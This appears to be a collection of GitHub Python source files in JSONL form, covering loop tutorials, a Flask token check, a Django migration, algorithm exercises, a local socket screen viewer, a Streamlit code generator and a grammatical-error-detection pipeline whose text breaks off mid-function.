appropriate message if even and continues to run\n\nwhile True:\n value = input(\"Integer, please [q to quit]: \")\n if value == 'q':\n break\n number = int(value)\n if number % 2 == 0: # even number\n print(\"Number is even, not what we want!\")\n continue\n print(f\"{number} squared is {number**2}\")\n \n# Check break Use with else\nnumbers = [1, 3, 5]\nposition = 0\nwhile position < len(numbers):\n number = numbers[position]\n if number % 2 == 0:\n print(\"Found even number\", number)\n break\n position += 1\nelse: # break not called\n print(\"No even number found\")\n\n# Iterating through strings\nword = \"thud\"\n# approach 1\noffset = 0\nwhile offset < len(word):\n print(word[offset])\n offset += 1\n\n# approach 2 (more pythonic)\nfor letters in word:\n print(letters) # string iteration produces one char at a time\n\n# breaking\nword = \"thud\"\nfor letter in word:\n if letter == 'u':\n break\n print(letter)\n# continue is same as in while()\n\n# checking break Use with else\nword = \"thud\"\nfor letter in word:\n if letter == 'x':\n print(\"Eek! An 'x'!\")\n break \n print(letter)\nelse:\n print(\"No 'x' in there\")\n\n# RANGE\nfor x in range(0, 3):\n print(x)\n\nprint(list(range(0, 3)))\n\n# printing/counting backwards\nfor x in range(2, -1, -1):\n print(x)\n\nprint(list(range(2, -1, -1)))\n\nprint(list(range(0, 11, 2)))\n","repo_name":"JoshAmpofo/python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43321172252","text":"# Import the needed Flask Modules\nfrom flask import request, jsonify\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\n\n# Import module db models\nfrom app.models import Tokens\n\n# Initialize HTTPTokenAuth\ntoken_auth = HTTPTokenAuth()\n\n# Do the token check\n@token_auth.verify_token\ndef verify_token(token):\n user = Tokens.check_token(token) if token else None\n return user is not None\n\n\n# Bail out error\n@token_auth.error_handler\ndef token_auth_error():\n return jsonify(error=\"Bad Token\"), 401\n","repo_name":"presianbg/soar-connector","sub_path":"xg-soar-engine/app/mod_api/api_auth.py","file_name":"api_auth.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21295274809","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('aldryn_events', '0022_auto_20160109_1743'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='eventsconfigtranslation',\n name='app_title',\n field=models.CharField(default='', max_length=234, verbose_name='application title'),\n ),\n migrations.AlterField(\n model_name='registration',\n name='language_code',\n field=models.CharField(default='en', max_length=32, choices=[('en', 'English')]),\n ),\n ]\n","repo_name":"aldryn/aldryn-events","sub_path":"aldryn_events/migrations/0023_auto_20160212_1717.py","file_name":"0023_auto_20160212_1717.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"1841969437","text":"#계속 시간초과나서 pypy로 돌림,,\n#메모리:259740 시간:520ms\nimport sys\ninput=sys.stdin.readline\nN,M=map(int,input().split())\nliist=list(map(int,input().split()))\n\nstart=1\nend=max(liist)\n\nwhile start<=end:\n middle=(start+end)//2\n tree=0\n \n for i in liist:\n if i>=middle:\n tree+=i-middle\n \n if tree>=M:\n start=middle+1\n else:\n end=middle-1\nprint(end)\n \n","repo_name":"meeeeju/Python-Algorithm-Study","sub_path":"hyunji/BOJ/이진탐색/2805_나무자리기.py","file_name":"2805_나무자리기.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42941309287","text":"import os\nimport io\nimport socket\nimport gzip\nimport time\nimport threading\n\nimport numpy as np\nimport PIL\nimport PIL.Image\nimport cv2\n\nDEFAULT_SERVER_PORT = 21578\n\nsocket_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket_connection.connect(('127.0.0.1', DEFAULT_SERVER_PORT))\n\n\nCV2_WINDOW_NAME = 'frame'\ncv2.namedWindow(CV2_WINDOW_NAME)\n\nREFRESH_RATE = 60\nWAIT_TIME_SECONDS = 1 / REFRESH_RATE\nWAIT_TIME_MILLISECONDS = int(WAIT_TIME_SECONDS * 1000)\n\nprint('REFRESH_RATE', REFRESH_RATE)\nprint('WAIT_TIME_SECONDS', WAIT_TIME_SECONDS)\n\nGLOBAL_STOP_FLAG = False\nCURRENT_FRAME = None\n\n\ndef cv2_ui_thread_function():\n while not GLOBAL_STOP_FLAG:\n if os.path.exists('stop'):\n break\n\n if CURRENT_FRAME is not None:\n cv2.imshow(CV2_WINDOW_NAME, CURRENT_FRAME)\n cv2.waitKey(WAIT_TIME_MILLISECONDS)\n\n\ncv2_ui_thread = threading.Thread(target=cv2_ui_thread_function)\ncv2_ui_thread.start()\n\n\nPENDING_DATA = b''\nMODIFY_PENDING_DATA_LOCK = threading.Lock()\n\n\ndef process_data_thread_function():\n global PENDING_DATA\n global CURRENT_FRAME\n\n while not GLOBAL_STOP_FLAG:\n if os.path.exists('stop'):\n break\n\n if len(PENDING_DATA) < 4:\n try:\n time.sleep(WAIT_TIME_SECONDS)\n except Exception as ex:\n print(ex)\n continue\n\n image_data_size_bs = PENDING_DATA[:4]\n image_data_size = int.from_bytes(image_data_size_bs, byteorder='little')\n if len(PENDING_DATA) < (4 + image_data_size):\n try:\n time.sleep(WAIT_TIME_SECONDS)\n except Exception as ex:\n print(ex)\n continue\n\n image_data_bs = PENDING_DATA[4:4 + image_data_size]\n with MODIFY_PENDING_DATA_LOCK:\n PENDING_DATA = PENDING_DATA[4 + image_data_size:]\n\n np_buffer = np.frombuffer(image_data_bs, dtype=np.uint8)\n frame = cv2.imdecode(np_buffer, cv2.IMREAD_COLOR)\n CURRENT_FRAME = frame\n\n\nprocess_data_thread = threading.Thread(target=process_data_thread_function)\nprocess_data_thread.start()\n\nwhile True:\n if os.path.exists('stop'):\n break\n\n bs = socket_connection.recv(65536)\n bs_len = len(bs)\n print(time.perf_counter_ns(), bs_len, end='\\r')\n if bs_len == 0:\n break\n\n with MODIFY_PENDING_DATA_LOCK:\n PENDING_DATA += bs\n","repo_name":"ichisadashioko/remotedesktop","sub_path":"deprecated/pythonclient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"32884456548","text":"import streamlit as st\nimport os\nfrom sidebars.anomaly_detection_sidebars import kNN_ad_sidebar\nfrom sidebars.anomaly_detection_sidebars import LOF_sidebar\nfrom sidebars.anomaly_detection_sidebars import iForest_sidebar\nfrom sidebars.classification_sidebars import kNN_sidebar\nfrom sidebars.classification_sidebars import SVM_sidebar\nfrom sidebars.classification_sidebars import Logistic_Regression_sidebar\nfrom sidebars.classification_sidebars import RF_sidebar\nfrom sidebars.classification_sidebars import Decision_Trees_sidebar\nfrom sidebars.clustering_sidebars import DBSCAN_sidebar\nfrom sidebars.clustering_sidebars import KMEANS_sidebar\nfrom sidebars.clustering_sidebars import OPTICS_sidebar\nimport base64\nfrom jinja2 import Environment, FileSystemLoader\n\ndef header(text):\n l = int((70 - len(text))/2)\n return \"#\" + '='*(l-1) + \" \" + text + \" \" + '='*l\n\ndef download_button(code, filename, text=\"Download (.py)\"):\n # Reference: https://discuss.streamlit.io/t/how-to-download-file-in-streamlit/1806\n b64 = base64.b64encode(code.encode()).decode()\n href = f'{text}'\n st.markdown(href, unsafe_allow_html=True)\n\n# Page title.\nst.title(\"Machine Learning Code Generator\")\n#st.write(\"by Durgesh Samariya\")\n\"\"\"\n[![Star](https://img.shields.io/github/stars/durgeshsamariya/MLgenerator.svg?logo=github&style=social)](https://github.com/durgeshsamariya/MLgenerator/stargazers)\n [![GitHub issues](https://img.shields.io/github/issues/durgeshsamariya/MLgenerator.svg)](https://GitHub.com/durgeshsamariya/MLgenerator/issues/)\n [![made-with-python](https://img.shields.io/badge/Made%20with-Python-1f425f.svg)](https://www.python.org/)\n [![Made With Love](https://img.shields.io/badge/Made%20With-Love-orange.svg)](https://github.com/chetanraj/awesome-github-badges) \n [![Buy me a coffee](https://img.shields.io/badge/Buy%20me%20a%20coffee--yellow.svg?logo=buy-me-a-coffee&logoColor=orange&style=social)](https://www.buymeacoffee.com/themlphdstudent)\n\n\"\"\"\nst.markdown(\"-----\")\n\"\"\"\n\nGenerate your machine learning starter code in five simple steps. \n\n1. Select Task (Anomaly Detection or Classification or Clustering).\n2. Select Algorithm\n3. Specify data set and hyperparameters.\n4. Starter code will be generated below.\n5. Download the code.\n\"\"\"\nst.markdown(\"-----\")\n\n\ntemplates = {\n 'Anomaly Detection': {\n 'LOF': 'templates/Anomaly Detection/LOF',\n 'iForest': 'templates/Anomaly Detection/iForest',\n 'kNN': 'templates/Anomaly Detection/kNN'\n },\n 'Classification': {\n 'Logistic Regression': 'templates/Classification/Logistic Regression',\n 'kNN': 'templates/Classification/kNN',\n 'SVM': 'templates/Classification/SVM',\n 'Random Forest': 'templates/Classification/Random Forest',\n 'Decision Tree': 'templates/Classification/Decision Trees'\n },\n 'Clustering': {\n 'DBSCAN': 'templates/Clustering/DBSCAN',\n 'K-Means': 'templates/Clustering/K-Means',\n 'OPTICS': 'templates/Clustering/OPTICS',\n }\n}\n\nwith st.sidebar:\n st.write(\"## Choose Task\")\n task = st.selectbox(\"Task\", list(templates.keys()))\n if isinstance(templates[task], dict):\n algorithm = st.sidebar.selectbox(\n \"Which Algorithm?\", list(templates[task].keys())\n )\n template_path = templates[task][algorithm]\n else:\n template_path = templates[task]\n if task == \"Anomaly Detection\":\n if algorithm == 'LOF':\n inputs = LOF_sidebar()\n if algorithm == \"iForest\":\n inputs = iForest_sidebar()\n if algorithm == \"kNN\":\n inputs = kNN_ad_sidebar()\n if task == \"Classification\":\n if algorithm == \"Logistic Regression\":\n inputs = Logistic_Regression_sidebar()\n if algorithm == 'kNN':\n inputs = kNN_sidebar()\n if algorithm == 'SVM':\n inputs = SVM_sidebar()\n if algorithm == \"Random Forest\":\n inputs = RF_sidebar()\n if algorithm == \"Decision Tree\":\n inputs = Decision_Trees_sidebar()\n if task == \"Clustering\":\n if algorithm == \"DBSCAN\":\n inputs = DBSCAN_sidebar()\n if algorithm == \"K-Means\":\n inputs = KMEANS_sidebar()\n if algorithm == \"OPTICS\":\n inputs = OPTICS_sidebar()\n\nenv = Environment(loader=FileSystemLoader(template_path), trim_blocks=True, lstrip_blocks=True)\n\ntemplate = env.get_template(\"code-template.py.jinja\")\ncode = template.render(header=header, **inputs)\n\nfile_name = task.replace(\" \", \"_\") + \"_\" + algorithm.replace(\" \", \"_\") + \".py\"\ndownload_button(code, file_name.lower())\n\nst.code(code)","repo_name":"durgeshsamariya/MLgenerator","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"16"} +{"seq_id":"12973859341","text":"import numpy as np\nfrom src.sorting.quickselect import select\n\ndef test_trivial():\n L = [1]\n selected = select(L, 0)\n assert selected == 1\n\ndef test_nontrivial():\n L = range(10)\n np.random.shuffle(L)\n selected = select(L, 5)\n assert selected == 5\n","repo_name":"coxj1990/algos","sub_path":"tests/sorting/test_quickselect.py","file_name":"test_quickselect.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37631370332","text":"import os\nimport random\nimport tarfile\n\nrandom.seed(1024)\n\n# parse arg from command line\ndatalist = os.sys.argv[1]\ndatatype = os.sys.argv[2]\nnum_gpus = int(os.sys.argv[3])\nnum_samples_per_tar = int(os.sys.argv[4]) # only used in shard mode\nnew_datalist = os.sys.argv[5]\n\nassert datatype in [\"shard\", \"raw\"]\n\n\nfiltered_list = []\nwith open(datalist, \"r\") as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n if datatype == \"raw\":\n valid_num = len(lines) // num_gpus * num_gpus\n random.shuffle(lines)\n filtered_list = lines[:valid_num]\n else:\n for line in lines:\n cnt = 0\n with open(line, \"rb\") as tar:\n stream = tarfile.open(fileobj=tar, mode=\"r|*\")\n for tarinfo in stream:\n name = tarinfo.name\n pos = name.rfind('.')\n assert pos > 0\n prefix, postfix = name[:pos], name[pos + 1:]\n if postfix == 'txt':\n cnt += 1\n if cnt == num_samples_per_tar:\n filtered_list.append(line)\n valid_num = len(filtered_list) // num_gpus * num_gpus\n random.shuffle(filtered_list)\n filtered_list = filtered_list[:valid_num]\n filtered_list.sort()\n print(\"before filter: {} after filter: {}\".format(len(lines), len(filtered_list)))\n\nwith open(new_datalist, \"w\") as f:\n for line in filtered_list:\n f.writelines(\"{}\\n\".format(line))\n","repo_name":"wenet-e2e/wenet","sub_path":"tools/filter_uneven_data.py","file_name":"filter_uneven_data.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":3402,"dataset":"github-code","pt":"16"} +{"seq_id":"5379744645","text":"#!/usr/bin/env python3\n# http://codekata.com/kata/kata08-conflicting-objectives/\n\nfrom sys import stderr\nfrom time import perf_counter\n\n\nflux_brut = open(\"dico.txt\")\nflux_épuré = map(str.strip, flux_brut)\ndictionnaire = set(flux_épuré)\n\ndef a_six_lettres(mot):\n\treturn len(mot) == 6\n\nmots_de_six_lettres = list(filter(a_six_lettres, dictionnaire))\n\npaires_de_mots = []\nintervalle = range(1, 6)\n\ntemps_début = perf_counter()\n\nfor stuff in range(64):\n\tfor mot in mots_de_six_lettres:\n\t\tfor curseur in intervalle:\n\t\t\tpréfixe = mot[:curseur]\n\t\t\tsuffixe = mot[curseur:]\n\t\t\tif (préfixe in dictionnaire and suffixe in dictionnaire):\n\t\t\t\tpaires_de_mots.append((préfixe, suffixe))\n\ntemps_fin = perf_counter()\n\t\t\t\nfor préfixe, suffixe in paires_de_mots:\n\tprint(préfixe, \"+\", suffixe, \"->\", préfixe+suffixe)\n\nprint(\"Time:\", temps_fin - temps_début, file=stderr)\n","repo_name":"okiwi/triple-dojo-association-mots-dictionnaire","sub_path":"performance-temoin.py","file_name":"performance-temoin.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3603685589","text":"# https://leetcode.com/problems/champagne-tower/description/?envType=daily-question&envId=2023-09-24\n\nclass Solution:\n\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float :\n dic = self.populateDefultDict()\n\n row = 0\n column = 0\n while poured :\n for per_column in range(0, column) :\n if dic[(row, per_column)][\"value\"] != 1 :\n dic[(row, per_column)][\"value\"] += 0.5 ** row\n else :\n row += 1\n dic[dic[(row - 1, per_column)][\"next1\"]][\"value\"] += 0.5 ** row\n dic[dic[(row - 1, per_column)][\"next2\"]][\"value\"] += 0.5 ** row\n\n\n return dic[(query_row, query_glass)][\"value\"]\n\n def populateDefultDict(self) -> dict:\n dic = {}\n for row in range(0, 100) :\n for column in range(0, 100) :\n dic[(row, column)] = { \"value\" : 0, \"next1\" : (row + 1, column), \"next2\" : (row + 1, column + 1)}\n return dic\n \n def doPoured(self, dic : dict, row, per_column) -> dict:\n for per_column in range(0, column) :\n if dic[(row, per_column)][\"value\"] != 1 :\n dic[(row, per_column)][\"value\"] += 0.5 ** row\n else :\n row += 1\n dic[dic[(row, per_column)][\"next1\"]][\"value\"] += 0.5 ** row\n dic[dic[(row, per_column)][\"next2\"]][\"value\"] += 0.5 ** row\n row = 0\n \n\nclass Solution2:\n \n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n # Initialize a 2D array to represent the glasses\n glasses = [[0.0] * (query_row + 1) for _ in range(query_row + 1)]\n # Pour the initial amount of champagne into the top glass\n glasses[0][0] = poured\n # Simulate the flow of champagne from top to bottom\n for row in range(query_row):\n for glass in range(row + 1):\n excess = (glasses[row][glass] - 1) / 2.0\n if excess > 0:\n glasses[row + 1][glass] += excess\n glasses[row + 1][glass + 1] += excess\n # Ensure the value is between 0 and 1 (no more than one glass worth)\n return min(1.0, glasses[query_row][query_glass])\n\npoured1 = query_row1 = query_glass1 = 1\npoured2 , query_row2 , query_glass2 = (3 , 1 , 1)\npoured3 , query_row3 , query_glass3 = (100000009 , 33 , 17)\n\na = Solution2()\n#print(a.champagneTower(poured1 , query_row1 , query_glass1))\nprint(a.champagneTower(poured2 , query_row2 , query_glass2))\nprint(a.champagneTower(poured3 , query_row3 , query_glass3))","repo_name":"maslri/Algorithms","sub_path":"Champagne Tower.py","file_name":"Champagne Tower.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7303826324","text":"from furgonetes import Furgonetes\nfrom typing import List, Set, Generator\ndef visualitzar(estacions, n2):\n import matplotlib.pyplot as plt\n\n # Supongamos que tienes una instancia de la clase Estaciones llamada 'estacions'\n # y una instancia de la clase Estat llamada 'n2'\n\n # Extrae las coordenadas de las estaciones\n coordX = [estacion.coordX for estacion in estacions.lista_estaciones]\n coordY = [estacion.coordY for estacion in estacions.lista_estaciones]\n\n # Crea un gráfico de dispersión para mostrar las estaciones en el mapa\n plt.figure(figsize=(8, 8)) # Ajusta el tamaño del gráfico según tus preferencias\n plt.scatter(coordX, coordY, label=\"Estaciones\", color=\"blue\")\n\n # Personaliza el gráfico (etiquetas, título, ejes, etc.)\n plt.xlabel(\"Coordenada X\")\n plt.ylabel(\"Coordenada Y\")\n plt.title(\"Mapa de Estaciones\")\n\n # Agrega etiquetas a las estaciones\n for i, estacion in enumerate(estacions.lista_estaciones):\n plt.text(coordX[i], coordY[i], f\"Estacion {i+1}\", fontsize=8, ha='center', va='bottom')\n\n # Recorre las instancias de Furgonetes en n2.ruta\n for furgoneta in n2.ruta:\n if furgoneta.estacio_carrega is not None and furgoneta.estacio_descarrega1 is not None:\n # Trazar una línea desde estacio_carrega a estacio_descarrega1\n x1, y1 = furgoneta.estacio_carrega.coordX, furgoneta.estacio_carrega.coordY\n x2, y2 = furgoneta.estacio_descarrega1.coordX, furgoneta.estacio_descarrega1.coordY\n plt.plot([x1, x2], [y1, y2], color=\"red\", linewidth=1)\n\n if furgoneta.estacio_descarrega1 is not None and furgoneta.estacio_descarrega2 is not None:\n # Trazar una línea desde estacio_descarrega1 a estacio_descarrega2\n x1, y1 = furgoneta.estacio_descarrega1.coordX, furgoneta.estacio_descarrega1.coordY\n x2, y2 = furgoneta.estacio_descarrega2.coordX, furgoneta.estacio_descarrega2.coordY\n plt.plot([x1, x2], [y1, y2], color=\"green\", linewidth=1)\n\n # Muestra el gráfico\n plt.legend()\n plt.grid()\n plt.show()\n","repo_name":"gibertantentas/ABIA","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32005582440","text":"from transformers import AutoModelForTokenClassification\r\nfrom typing import List, Union, Tuple\r\n\r\nfrom utils import *\r\nfrom dataset import *\r\nfrom torch.utils.data import DataLoader\r\nfrom models import *\r\n\r\n\r\ndef map_to_df(texts:str) -> pd.DataFrame:\r\n if isinstance(texts, str):\r\n texts = [texts]\r\n return pd.DataFrame(data=texts, columns=['text'])\r\n\r\n\r\nclass POSTaggingPipeline:\r\n def __init__(self, model_name:str, data_configs=None):\r\n self.model = self._init_model(model_name)\r\n self.data_configs = data_configs if data_configs else self._get_default_data_configs(model_name)\r\n \r\n def _init_model(self, model_name):\r\n return AutoModelForTokenClassification.from_pretrained(model_name)\r\n\r\n def _get_default_data_configs(self, model_name):\r\n return {\r\n 'model_name':model_name,\r\n 'maxlength':128,\r\n 'train_val_split':-1,\r\n 'test':True, \r\n 'remove_username':False,\r\n 'remove_punctuation':False, \r\n 'to_simplified':False, \r\n 'emoji_to_text':False, \r\n 'split_words':False, \r\n 'cut_all':False, \r\n }\r\n\r\n def feedforward(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings, \r\n device:torch.device, \r\n ): \r\n from tqdm import tqdm\r\n\r\n if 'cuda' in device.type:\r\n self.model.cuda()\r\n\r\n logits = []\r\n dataloader = DataLoader(ds.dataset['train'].with_format('torch'), batch_size=16)\r\n\r\n for batch in tqdm(dataloader):\r\n inputs = {k:v.to(device) for k,v in batch.items()\r\n if k in ds.tokenizer.model_input_names or k == 'auxiliary_input_ids'}\r\n with torch.no_grad():\r\n output = self.model(**inputs)\r\n\r\n logits.append(output['logits'])\r\n return torch.concat(logits)\r\n\r\n def __call__(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings=None, \r\n texts:Union[List[str], str]=None, \r\n device:torch.device=torch.device('cpu'), \r\n return_tags=True, \r\n ): \r\n if ds is not None:\r\n if not isinstance(ds, DatasetWithAuxiliaryEmbeddings):\r\n raise TypeError('Passed data object is not a Dataset. Pass it as argument `texts` instead.')\r\n else:\r\n ds = DatasetWithAuxiliaryEmbeddings(df=map_to_df(texts), **self.data_configs)\r\n ds.prepare_dataset()\r\n logits = self.feedforward(ds, device)\r\n tag_ids = torch.argmax(logits, dim=2)\r\n if return_tags:\r\n return tag_ids\r\n ds.dataset['train'] = ds.dataset['train'].add_column(name='tag_ids', column=[id for id in tag_ids.cpu().numpy()])\r\n ds.dataset['train'] = ds.dataset['train'].add_column(name='emissions', column=logits.cpu().numpy().tolist())\r\n return ds\r\n \r\n\r\nclass PipelineGED:\r\n def __init__(self, model_name:str, oob_model_name=None, model_architecture:str='bert_with_clf_head', data_configs=None, pooling_mode='cls', **kwargs):\r\n # self.model = AutoModelForSequenceClassification.from_pretrained(\r\n # model_name, num_labels=2, \r\n # )\r\n \r\n if model_architecture == 'bert_with_clf_head':\r\n self.model = AutoModelBaseline(\r\n model_name, \r\n n_labels=2, \r\n **kwargs, \r\n )\r\n elif model_architecture == 'bert_word_based':\r\n self.model = AutoModelBaseline(\r\n model_name, \r\n n_labels=2, \r\n **kwargs, \r\n )\r\n # elif model_architecture == 'bert_with_crf_head':\r\n # self.model = BertWithCRFHead(\r\n # model_name, \r\n # n_labels=2, \r\n # )\r\n elif model_architecture == 'bert_with_oob_model':\r\n self.model = AutoModelWithOOBModel(\r\n model=model_name, \r\n oob_model=oob_model_name, \r\n n_labels=2, \r\n concatenate=True,\r\n **kwargs, \r\n )\r\n elif model_architecture == 'bert_with_bigru':\r\n self.model = AutoModelBiGRU(\r\n model=model_name, \r\n n_labels=2, \r\n **kwargs, \r\n )\r\n else:\r\n print(f'Model architecture {model_architecture} is not implemented.')\r\n if data_configs:\r\n self.data_configs = data_configs\r\n else:\r\n self.data_configs = {\r\n 'model_name':model_name,\r\n 'maxlength':128,\r\n 'train_val_split':-1,\r\n 'test':True, \r\n 'remove_username':False,\r\n 'remove_punctuation':False, \r\n 'to_simplified':False, \r\n 'emoji_to_text':False, \r\n 'split_words':False, \r\n 'cut_all':False, \r\n }\r\n if oob_model_name:\r\n self.data_configs['aux_model_name'] = oob_model_name\r\n self.model_architecture = model_architecture\r\n self.feedforward = self._feedforward_seq if model_architecture != 'bert_with_crf_head' else self._feedforward_token\r\n \r\n def _feedforward_seq(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings, \r\n checkpoints:List[str], \r\n device:torch.device, \r\n raw_outputs:bool=True, \r\n output_probabilities:bool=False, \r\n aggregate=True, \r\n ) -> np.ndarray:\r\n from tqdm import tqdm\r\n\r\n output_tensors = []\r\n for cp in checkpoints:\r\n state_dict = torch.load(cp, map_location=device)\r\n missing_keys, unexpected_keys = self.model.load_state_dict(state_dict, strict=False)\r\n if bool(missing_keys) | bool(unexpected_keys):\r\n print(f'Warning: state_dict does not match perfectly. \\nMissing keys: {missing_keys}\\nUnexpected keys: {unexpected_keys}')\r\n if 'cuda' in device.type:\r\n self.model.cuda()\r\n\r\n logits = []\r\n dataloader = DataLoader(ds.dataset['train'].with_format('torch'), batch_size=16)\r\n\r\n for batch in tqdm(dataloader):\r\n inputs = {k:v.to(device) for k,v in batch.items()\r\n if k in ds.tokenizer.model_input_names or k == 'auxiliary_input_ids'}\r\n with torch.no_grad():\r\n output = self.model(**inputs)\r\n logits.append(output['logits']) \r\n output_tensors.append(torch.concat(logits))\r\n output_logits_agg = torch.dstack(output_tensors)\r\n\r\n if aggregate:\r\n if output_probabilities:\r\n from torch.nn import Softmax\r\n return Softmax(dim=1)(output_logits_agg.mean(-1)).cpu().numpy(), \r\n if raw_outputs:\r\n return output_logits_agg.mean(-1).cpu().numpy()\r\n return output_logits_agg.mean(-1).argmax(1).cpu().numpy()\r\n return output_logits_agg\r\n \r\n def _feedforward_token(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings, \r\n checkpoints:List[str], \r\n device:torch.device, \r\n raw_outputs:bool=True, \r\n output_probabilities:bool=False, \r\n majority_vote=False, \r\n ) -> Tuple[np.ndarray]:\r\n output_tensors = []\r\n output_sequence_logits = []\r\n from tqdm import tqdm\r\n\r\n for cp in checkpoints:\r\n state_dict = torch.load(cp, map_location=device)\r\n # for key in list(state_dict.keys()):\r\n # state_dict[key.replace('bert', 'base_model')] = state_dict.pop(key)\r\n missing_keys, unexpected_keys = self.model.load_state_dict(state_dict, strict=False)\r\n if bool(missing_keys) | bool(unexpected_keys):\r\n print(f'Warning: state_dict does not match perfectly. \\nMissing keys: {missing_keys}\\nUnexpected keys: {unexpected_keys}')\r\n if 'cuda' in device.type:\r\n self.model.cuda()\r\n\r\n logits = []\r\n sequence_logits = []\r\n dataloader = DataLoader(ds.dataset['train'].with_format('torch'), batch_size=16)\r\n\r\n for batch in tqdm(dataloader):\r\n inputs = {k:v.to(device) for k,v in batch.items()\r\n if k in ds.tokenizer.model_input_names or k == 'auxiliary_input_ids'}\r\n with torch.no_grad():\r\n output = self.model(**inputs)\r\n try:\r\n logits.append(output['logits']) # not used\r\n sequence_logits.append(output['sequence_logits'])\r\n pass_logits = True\r\n except:\r\n logits.append(output['predictions'])\r\n pass_logits = False\r\n output_tensors.append(torch.concat(logits))\r\n if pass_logits:\r\n output_sequence_logits.append(torch.concat(sequence_logits, dim=0))\r\n if pass_logits:\r\n output_sequence_logits_agg = torch.stack(output_sequence_logits, dim=3).mean(-1)\r\n if self.model.pooling_mode == 'max':\r\n output_logits_agg = postprocess_logits(output_sequence_logits_agg, ds.dataset['train']['attention_mask'])\r\n elif self.model.pooling_mode == 'cls':\r\n output_logits_agg = output_sequence_logits_agg[:, 0, :]\r\n elif self.model.pooling_mode == 'hybrid':\r\n output = output_sequence_logits_agg[:, 0, :] + \\\r\n postprocess_logits(output_sequence_logits_agg, ds.dataset['train']['attention_mask'])\r\n else:\r\n raise NotImplementedError(f'pooling mode {self.model.pooling_mode} is not implemented.')\r\n if majority_vote:\r\n return voting(torch.stack(output_tensors))\r\n else:\r\n if output_probabilities:\r\n from torch.nn import Softmax\r\n \r\n return (\r\n Softmax(dim=1)(output_logits_agg).cpu().numpy(), \r\n Softmax(dim=2)(output_sequence_logits_agg).cpu().numpy(), \r\n )\r\n \r\n if raw_outputs:\r\n return (\r\n output_logits_agg.cpu().numpy(), \r\n output_sequence_logits_agg.mean(-1).cpu().numpy()\r\n )\r\n return (output_logits_agg.argmax(1).cpu().numpy(), output_sequence_logits_agg.mean(-1).argmax(2).cpu().numpy())\r\n else:\r\n assert majority_vote, 'Must use majority voting if model outputs labels directly.'\r\n pred_labels = torch.stack(output_tensors) # has shape (n_models, n_examples, seq_len). \r\n n_models, n_samples, seq_len = pred_labels.size()\r\n pred_labels_flattened = pred_labels.view((n_models, n_samples*seq_len))\r\n agg_labels = []\r\n for single_examples_pred_labels in pred_labels_flattened.T:\r\n labels, counts = torch.unique(single_examples_pred_labels, return_counts=True)\r\n agg_labels.append(labels[torch.argmax(counts)])\r\n seq_predictions = torch.tensor(agg_labels).view(n_samples, seq_len)\r\n predictions = torch.any(seq_predictions, dim=1).int()\r\n return predictions, seq_predictions\r\n\r\n def __call__(\r\n self, \r\n texts:Union[List[str], str], \r\n checkpoints:List[str], \r\n device:torch.device, \r\n raw_outputs:bool=True, \r\n output_probabilities:bool=False, \r\n display=True, \r\n majority_vote=False, \r\n aggregate=True, \r\n ) -> np.ndarray:\r\n test = DatasetWithAuxiliaryEmbeddings(df=map_to_df(texts), **self.data_configs)\r\n test.prepare_dataset()\r\n if majority_vote:\r\n return self.feedforward(test, checkpoints, device, raw_outputs, output_probabilities, majority_vote=True)\r\n if self.model_architecture == 'bert_with_crf_head':\r\n probs, seq_probs = self.feedforward(test, checkpoints, device, raw_outputs, output_probabilities)\r\n err_char_lst = self.display_error_chars(seq_probs, test, display=display)\r\n return probs, seq_probs, err_char_lst\r\n else:\r\n return self.feedforward(test, checkpoints, device, raw_outputs, output_probabilities, aggregate=aggregate)\r\n\r\n @staticmethod\r\n def display_error_chars(seq_probs, test:DatasetWithAuxiliaryEmbeddings, display=True):\r\n import matplotlib.pyplot as plt\r\n\r\n err_char_lst = []\r\n for probs, txt_ids, mask in zip(seq_probs, test.inputs['input_ids'], test.inputs['attention_mask']):\r\n txt_ids = txt_ids.masked_select(mask.bool())\r\n err_idx = np.argwhere(probs[:txt_ids.size(-1), 1] > probs[:txt_ids.size(-1), 0]).flatten()\r\n err_chars = test.tokenizer.convert_ids_to_tokens(txt_ids[err_idx])\r\n if display:\r\n print(' '.join(test.tokenizer.convert_ids_to_tokens(txt_ids)))\r\n print(err_chars)\r\n err_char_lst.append(err_chars)\r\n if display:\r\n masks = test.inputs['attention_mask'].cpu().numpy()\r\n max_len = masks.sum(1).max()\r\n 